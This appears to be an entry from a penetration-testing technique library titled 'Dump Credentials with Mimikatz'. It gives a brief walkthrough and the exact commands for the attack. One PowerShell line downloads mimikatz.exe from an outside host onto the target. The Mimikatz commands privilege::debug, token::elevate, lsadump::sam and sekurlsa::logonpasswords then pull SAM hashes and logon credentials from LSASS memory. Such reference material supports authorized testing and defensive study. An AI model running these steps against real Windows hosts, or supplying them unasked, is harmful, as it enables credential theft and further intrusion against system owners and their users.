← Back to search

Dump Credentials with Mimikatz

credentialswindowstool

Summary

Transfer and run Mimikatz to enable debug privileges, then dump SAM hashes and cached logon credentials from LSASS.

Walkthrough

Mimikatz extracts hashes and plaintext credentials from a Windows host, given local admin / SeDebugPrivilege.

Steps

  1. Transfer the binary to the target (e.g. Invoke-WebRequest into C:\Users\Public).
  2. Optionally confirm local accounts and groups first with Get-LocalUser / Get-LocalGroup.
  3. In the Mimikatz console, run privilege::debug (and token::elevate) to gain the rights needed for memory access.
  4. Dump local SAM hashes with lsadump::sam and cached/active logon credentials with sekurlsa::logonpasswords.

Commands

powershell

Invoke-WebRequest http://<IP>:8081/mimikatz.exe -OutFile C:\Users\Public\mimikatz.exe

powershell

Get-LocalUser
Get-LocalGroup

other

privilege::debug
token::elevate
lsadump::sam
sekurlsa::logonpasswords